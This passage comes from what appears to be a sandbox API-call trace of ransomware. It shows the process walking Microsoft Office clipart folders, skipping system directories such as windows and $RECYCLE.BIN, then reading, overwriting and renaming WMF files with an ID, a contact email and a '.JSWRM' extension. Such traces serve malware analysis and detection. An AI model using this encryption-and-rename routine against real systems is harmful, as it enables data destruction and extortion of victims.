lpWideCharStr=0x0) returned 24 [0093.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0093.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0093.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0093.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0093.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0093.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.499] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03466_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03466_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0093.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0093.500] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3998, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03470_.WMF", cAlternateFileName="")) returned 1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2=".") returned 1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="..") returned 1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="...") returned 1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="windows") returned -1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="recovery") returned -1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="perflogs") returned -1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="documents and settings") returned 1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="system volume information") returned -1 [0093.500] lstrcmpiW (lpString1="PE03470_.WMF", lpString2="msocache") returned 1 [0093.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0093.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03470_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03470_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03470_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0093.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03470_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03470_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03470_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0093.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0093.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0093.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03470_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.501] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14744) returned 1 [0093.501] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3990) returned 0x24d210 [0093.501] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3990, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3990, lpOverlapped=0x0) returned 1 [0093.504] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.504] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3990, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3990, lpOverlapped=0x0) returned 1 [0093.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.504] CloseHandle (hObject=0x314) returned 1 [0093.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0093.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0093.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0093.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0093.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0093.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.505] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03470_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03470_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0093.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0093.505] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03513_.WMF", cAlternateFileName="")) returned 1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2=".") returned 1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="..") returned 1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="...") returned 1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="windows") returned -1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="recovery") returned -1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="perflogs") returned -1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="documents and settings") returned 1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="system volume information") returned -1 [0093.506] lstrcmpiW (lpString1="PE03513_.WMF", lpString2="msocache") returned 1 [0093.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0093.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03513_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03513_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03513_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0093.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0093.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03513_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03513_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03513_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0093.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0093.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03513_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.507] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3780) returned 1 [0093.507] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xec0) returned 0x23fc98 [0093.507] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xec0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xec0, lpOverlapped=0x0) returned 1 [0093.510] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.510] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xec0, lpOverlapped=0x0) returned 1 [0093.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0093.510] CloseHandle (hObject=0x314) returned 1 [0093.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0093.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0093.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0093.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0093.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0093.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.510] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03513_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03513_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0093.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.511] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1868, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03668_.WMF", cAlternateFileName="")) returned 1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2=".") returned 1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="..") returned 1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="...") returned 1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="windows") returned -1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="recovery") returned -1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="perflogs") returned -1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="documents and settings") returned 1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="system volume information") returned -1 [0093.511] lstrcmpiW (lpString1="PE03668_.WMF", lpString2="msocache") returned 1 [0093.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0093.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03668_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03668_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03668_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0093.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0093.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03668_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03668_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03668_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0093.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0093.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0093.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03668_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.513] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6248) returned 1 [0093.513] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1860) returned 0x205850 [0093.513] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1860, lpOverlapped=0x0) returned 1 [0093.527] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.527] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1860, lpOverlapped=0x0) returned 1 [0093.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.528] CloseHandle (hObject=0x314) returned 1 [0093.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0093.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0093.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0093.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0093.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0093.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0093.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.529] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03668_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03668_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 